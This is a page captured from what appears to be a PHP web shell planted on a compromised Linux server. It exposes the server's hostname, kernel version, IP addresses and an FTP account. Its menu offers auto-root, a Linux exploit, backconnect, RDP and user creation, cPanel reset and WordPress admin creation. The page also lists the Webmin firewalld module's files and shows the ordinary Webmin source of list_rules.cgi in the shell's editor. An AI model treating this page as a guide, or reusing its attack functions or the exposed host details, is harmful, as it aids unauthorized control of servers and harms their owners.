Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.213
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
firewalld /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
CHANGELOG
201
B
-rw-r--r--
bootup.cgi
456
B
-rwxr-xr-x
config
46
B
-rw-r--r--
config.info
88
B
-rw-r--r--
config.info.ca
103
B
-rw-r--r--
config.info.de
100
B
-rw-r--r--
config.info.fr
121
B
-rw-r--r--
config.info.no
96
B
-rw-r--r--
config.info.pl
98
B
-rw-r--r--
create_zone.cgi
2.09
KB
-rwxr-xr-x
default_zone.cgi
560
B
-rwxr-xr-x
delete_rules.cgi
915
B
-rwxr-xr-x
delete_zone.cgi
1.03
KB
-rwxr-xr-x
edit_forward.cgi
2.55
KB
-rwxr-xr-x
edit_port.cgi
1.78
KB
-rwxr-xr-x
edit_serv.cgi
1.23
KB
-rwxr-xr-x
firewalld-lib.pl
13.2
KB
-rw-r--r--
index.cgi
5.79
KB
-rwxr-xr-x
install_check.pl
469
B
-rwxr-xr-x
list_rules.cgi
4.84
KB
-rwxr-xr-x
log_parser.pl
794
B
-rwxr-xr-x
module.info
176
B
-rw-r--r--
module.info.af
0
B
-rw-r--r--
module.info.af.auto
116
B
-rw-r--r--
module.info.ar
0
B
-rw-r--r--
module.info.ar.auto
184
B
-rw-r--r--
module.info.be
0
B
-rw-r--r--
module.info.be.auto
177
B
-rw-r--r--
module.info.bg
0
B
-rw-r--r--
module.info.bg.auto
193
B
-rw-r--r--
module.info.ca
117
B
-rw-r--r--
module.info.cs
0
B
-rw-r--r--
module.info.cs.auto
140
B
-rw-r--r--
module.info.da
0
B
-rw-r--r--
module.info.da.auto
128
B
-rw-r--r--
module.info.de
124
B
-rw-r--r--
module.info.el
0
B
-rw-r--r--
module.info.el.auto
252
B
-rw-r--r--
module.info.es
0
B
-rw-r--r--
module.info.es.auto
131
B
-rw-r--r--
module.info.eu
0
B
-rw-r--r--
module.info.eu.auto
123
B
-rw-r--r--
module.info.fa
0
B
-rw-r--r--
module.info.fa.auto
185
B
-rw-r--r--
module.info.fi
0
B
-rw-r--r--
module.info.fi.auto
125
B
-rw-r--r--
module.info.fr
0
B
-rw-r--r--
module.info.fr.auto
134
B
-rw-r--r--
module.info.he
0
B
-rw-r--r--
module.info.he.auto
177
B
-rw-r--r--
module.info.hr
0
B
-rw-r--r--
module.info.hr.auto
125
B
-rw-r--r--
module.info.hu
0
B
-rw-r--r--
module.info.hu.auto
158
B
-rw-r--r--
module.info.it
0
B
-rw-r--r--
module.info.it.auto
128
B
-rw-r--r--
module.info.ja
0
B
-rw-r--r--
module.info.ja.auto
162
B
-rw-r--r--
module.info.ko
0
B
-rw-r--r--
module.info.ko.auto
143
B
-rw-r--r--
module.info.lt
0
B
-rw-r--r--
module.info.lt.auto
151
B
-rw-r--r--
module.info.lv
0
B
-rw-r--r--
module.info.lv.auto
131
B
-rw-r--r--
module.info.ms
0
B
-rw-r--r--
module.info.ms.auto
140
B
-rw-r--r--
module.info.mt
0
B
-rw-r--r--
module.info.mt.auto
124
B
-rw-r--r--
module.info.nl
0
B
-rw-r--r--
module.info.nl.auto
124
B
-rw-r--r--
module.info.no
0
B
-rw-r--r--
module.info.no.auto
129
B
-rw-r--r--
module.info.pl
132
B
-rw-r--r--
module.info.pt
0
B
-rw-r--r--
module.info.pt.auto
118
B
-rw-r--r--
module.info.pt_BR
0
B
-rw-r--r--
module.info.pt_BR.auto
124
B
-rw-r--r--
module.info.ro
0
B
-rw-r--r--
module.info.ro.auto
128
B
-rw-r--r--
module.info.ru
0
B
-rw-r--r--
module.info.ru.auto
185
B
-rw-r--r--
module.info.sk
0
B
-rw-r--r--
module.info.sk.auto
139
B
-rw-r--r--
module.info.sl
0
B
-rw-r--r--
module.info.sl.auto
126
B
-rw-r--r--
module.info.sv
0
B
-rw-r--r--
module.info.sv.auto
127
B
-rw-r--r--
module.info.th
0
B
-rw-r--r--
module.info.th.auto
211
B
-rw-r--r--
module.info.tr
0
B
-rw-r--r--
module.info.tr.auto
163
B
-rw-r--r--
module.info.uk
0
B
-rw-r--r--
module.info.uk.auto
181
B
-rw-r--r--
module.info.ur
0
B
-rw-r--r--
module.info.ur.auto
229
B
-rw-r--r--
module.info.vi
0
B
-rw-r--r--
module.info.vi.auto
165
B
-rw-r--r--
module.info.zh
0
B
-rw-r--r--
module.info.zh.auto
109
B
-rw-r--r--
module.info.zh_TW
0
B
-rw-r--r--
module.info.zh_TW.auto
115
B
-rw-r--r--
open-ports.pl
2.37
KB
-rwxr-xr-x
restart.cgi
346
B
-rwxr-xr-x
save_forward.cgi
1.55
KB
-rwxr-xr-x
save_ifaces.cgi
643
B
-rwxr-xr-x
save_port.cgi
1.13
KB
-rwxr-xr-x
save_rules.cgi
796
B
-rwxr-xr-x
save_serv.cgi
1.03
KB
-rwxr-xr-x
start.cgi
326
B
-rwxr-xr-x
stop.cgi
324
B
-rwxr-xr-x
zone_form.cgi
968
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : list_rules.cgi
#!/usr/bin/perl # List FirewallD rich and direct rules use strict; use warnings; no warnings 'redefine'; no warnings 'uninitialized'; require './firewalld-lib.pl'; our (%in, %text, %config); &ReadParse(); my $dzone = $in{'zone'}; if (!$dzone) { my $zone = &get_default_zone(); $dzone = $zone->{'name'}; } &ui_print_header(&text('list_rules_title_sub', "<tt>".&html_escape($dzone)."</tt>"), $text{'list_rules_title'}, ""); my $head; my @head = (undef, $text{'list_rules_type'}); my $tdc = "style=\"text-align: center\""; my @links = ( &select_all_link("rules"), &select_invert_link("rules") ); # Check rich rules first my $fh = 'rrules'; my $rcmd = "$config{'firewall_cmd'} --list-rich-rules --zone=".quotemeta($dzone).""; &open_execute_command($fh, "$rcmd 2>&1 </dev/null", 1); while(<$fh>) { my @body; if ($_ =~ /\S+/) { push(@body, $text{'list_rules_type_rich'}); # Get protocol if (/family=["'](ipv\d)["']/) { push(@head, $text{'list_rules_protocol'}); push(@body, $1 =~ /ipv6/i ? "IPv6" : "IPv4"); } # Get address if (/address=["'](.*?)["']/) { push(@head, $text{'list_rules_ip'}); push(@body, "$1 "); } # Get origin if (/\s+(source|destination)\s+/) { push(@head, $text{'list_rules_origin'}); push(@body, $1 eq 'source' ? 'Input' : 'Output'); } # Get action if (/(accept|reject|drop|mark$)/i) { push(@head, $text{'list_rules_action'}); push(@body, ucfirst($1)); } # Add full rule push(@head, $text{'list_rules_rule'}); push(@body, "<tt>$_</tt>"); # Print start if (!$head++) { print &ui_form_start("save_rules.cgi", "post"); print &ui_hidden("zone", $dzone); print &ui_links_row(\@links); print &ui_columns_start(\@head); } print &ui_checked_columns_row(\@body, [ 'width=5', $tdc, $tdc, undef, $tdc, $tdc, undef ], "rules", $_); } } close($fh); # Check direct rules my $fh2 = 'drules'; my $dcmd = "$config{'firewall_cmd'} --direct --get-all-rules"; &open_execute_command($fh2, "$dcmd 2>&1 </dev/null", 1); while(<$fh2>) { my @body; if ($_ =~ /\S+/) { my $ndash = "–"; my $br = "<br>"; my $nbsp = " "; my $ips = $ndash; my $candelete = 1; my $ipslimit = sub { my ($ips, $limit) = @_; $limit ||= 15; # Limit sanity check and adjustment $limit = 1 if ($limit < 1); $limit -= 1; my $ipscount = () = $ips =~ /$br/g; if ($ipscount > $limit) { my @ips = split($br, $ips); @ips = @ips[0 .. $limit]; $ips = join($br, @ips); $ips .= "<small>$br$nbsp".&text('list_rules_plus_more', $ipscount-$limit)."</small>"; } return $ips; }; # Extract IPs from match sets if (/set\s+\-\-match-set\s+(.*?)\s+/) { my $ipset_name = $1; my $ipset_cmd = &has_command($config{'firewall_ipset'} || 'ipset'); my $ipset_cmd_out = &backquote_logged("$ipset_cmd list ".quotemeta($ipset_name)." 2>&1 </dev/null"); if (!$?) { if ($ipset_cmd_out =~ /number\s+of\s+entries:\s+(\d)+/i) { if ($1 > 0) { my @ipset_cmd_out_lines = split(/\n/, $ipset_cmd_out); my @ips = map { $_ =~ /^([0-9\.\:a-f\/]+)/i } @ipset_cmd_out_lines; $ips = join("$nbsp$nbsp$br", @ips); } } } # Rules with match sets must not be controlled here $candelete = 0; } # Standard direct rules else { # Extract IPs from the rule, # considering comma separated my @ips = ($_ =~ /-[sd]\s+([0-9\.\:a-f,\/]+)/gi); $ips = join("$nbsp$nbsp$br", @ips); $ips =~ s/\s*,\s*/$nbsp$nbsp$br/g; $ips ||= $ndash; } # Trim the number of IPs to allow at max 10 $ips = &$ipslimit($ips); # Add type name push(@body, $text{'list_rules_type_direct'}); # Get protocol if (/(ipv\d)/) { push(@head, $text{'list_rules_protocol'}); push(@body, $1 =~ /ipv6/i ? "IPv6" : "IPv4"); } # Get address push(@head, $text{'list_rules_ip'}); push(@body, $ips); # Get origin if (/(INPUT|OUTPUT|FORWARD|POSTROUTING)/) { push(@head, $text{'list_rules_origin'}); push(@body, ucfirst(lc($1))); } # Get action if (/(ACCEPT|REJECT|DROP|MARK|MASQUERADE$)/) { push(@head, $text{'list_rules_action'}); push(@body, ucfirst(lc($1))); } # Add full rule push(@head, $text{'list_rules_rule'}); push(@body, "<tt>$_</tt>"); # Print start if (!$head++) { print &ui_form_start("save_rules.cgi", "post"); print &ui_hidden("zone", $dzone); print &ui_links_row(\@links); print &ui_columns_start(\@head); } print &ui_checked_columns_row(\@body, [ 'width=5', $tdc, $tdc, undef, $tdc, $tdc, undef ], "rules", $_, undef, !$candelete); } } close($fh2); if ($head) { print &ui_columns_end(); print &ui_links_row(\@links); print &ui_form_end([ [ 'remove', $text{'list_rules_delete'} ] ] ); } else { print "There are no existing direct or rich firewall rules to display." } &ui_print_footer("index.cgi?zone=".&urlize($dzone), $text{'index_return'});
Close